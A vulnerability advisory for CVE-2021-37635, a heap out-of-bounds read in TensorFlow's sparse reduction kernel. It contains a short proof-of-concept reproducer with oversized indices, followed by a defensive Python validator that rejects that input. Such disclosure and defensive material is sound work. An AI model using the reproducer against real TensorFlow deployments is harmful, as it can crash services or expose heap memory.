CVE-2021-37635: Heap out of bounds access in sparse reduction operations
The implementation of sparse reduction operations in TensorFlow can trigger accesses outside the bounds of heap-allocated data; the reproducer below supplies indices that lie beyond the tensor's dense_shape:
import tensorflow as tf
x = tf.SparseTensor(
    indices=[[773, 773, 773], [773, 773, 773]],  # 773 exceeds every dimension of dense_shape
    values=[1, 1],
    dense_shape=[337, 337, 337])
tf.sparse.reduce_sum(x, 1)  # reduction reads heap memory outside the allocation
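The root cause is that the reduction kernel trusted the caller-supplied indices without checking them against dense_shape. The following added example (written for this page, not TensorFlow's code and not the code of the linked fix commit) shows the class of check a defender wants: a pure-Python validator that rejects out-of-range, negative or mis-ranked indices, followed by a tiny reference sparse reduce_sum that refuses to run until validation passes. The function names, the dict-based output format and the helper that replays the advisory's reproducer input are assumptions made for this illustration.

```python
from typing import Dict, Optional, Sequence, Tuple

Index = Sequence[int]


def validate_sparse_indices(indices: Sequence[Index],
                            values: Sequence[float],
                            dense_shape: Sequence[int]) -> Optional[str]:
    """Return None if the sparse tensor is well-formed, else a message
    describing the first violation found.

    Checks: one value per index, non-negative shape, every index has the
    tensor's rank, and every coordinate i satisfies 0 <= i < dense_shape[d].
    The last check is the one whose absence let the advisory's reproducer
    read outside the heap allocation (773 >= 337 in every dimension).
    """
    rank = len(dense_shape)
    if len(indices) != len(values):
        return f"{len(indices)} indices but {len(values)} values"
    if any(size < 0 for size in dense_shape):
        return f"dense_shape {list(dense_shape)} has a negative dimension"
    for row, idx in enumerate(indices):
        if len(idx) != rank:
            return f"index {row} has rank {len(idx)}, expected {rank}"
        for dim, (i, size) in enumerate(zip(idx, dense_shape)):
            if not 0 <= i < size:
                return f"index {row} dim {dim}: {i} not in [0, {size})"
    return None


def sparse_reduce_sum(indices: Sequence[Index],
                      values: Sequence[float],
                      dense_shape: Sequence[int],
                      axis: int) -> Dict[Tuple[int, ...], float]:
    """Reference sparse sum over one axis, as a dict keyed by the remaining
    coordinates. Raises ValueError instead of touching out-of-range data."""
    err = validate_sparse_indices(indices, values, dense_shape)
    if err is not None:
        raise ValueError(f"invalid SparseTensor: {err}")
    if not 0 <= axis < len(dense_shape):
        raise ValueError(f"axis {axis} out of range for rank {len(dense_shape)}")
    out: Dict[Tuple[int, ...], float] = {}
    for idx, v in zip(indices, values):
        key = tuple(i for d, i in enumerate(idx) if d != axis)
        out[key] = out.get(key, 0) + v
    return out


# Constructed copy of the advisory's reproducer arguments (hypothetical name).
ADVISORY_INPUT = {
    "indices": [[773, 773, 773], [773, 773, 773]],
    "values": [1, 1],
    "dense_shape": [337, 337, 337],
}


def advisory_input_is_rejected() -> bool:
    """True if the validated reduce refuses the out-of-bounds reproducer."""
    try:
        sparse_reduce_sum(**ADVISORY_INPUT, axis=1)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("reproducer rejected:", advisory_input_is_rejected())
    # Well-formed input: two entries sharing coordinates (0, 2) once axis 1 is dropped.
    print(sparse_reduce_sum([[0, 1, 2], [0, 2, 2]], [1, 1], [3, 3, 3], axis=1))
```

Validating at the boundary where untrusted indices enter the system is the general lesson: a sparse tensor's indices are data, and any kernel that dereferences them must bound-check against dense_shape before the first memory access, not rely on callers to do so.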
References
- github.com/advisories/GHSA-cgfm-62j4-v4rf
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-548.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-746.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-257.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750
- github.com/tensorflow/tensorflow/security/advisories/GHSA-cgfm-62j4-v4rf
- nvd.nist.gov/vuln/detail/CVE-2021-37635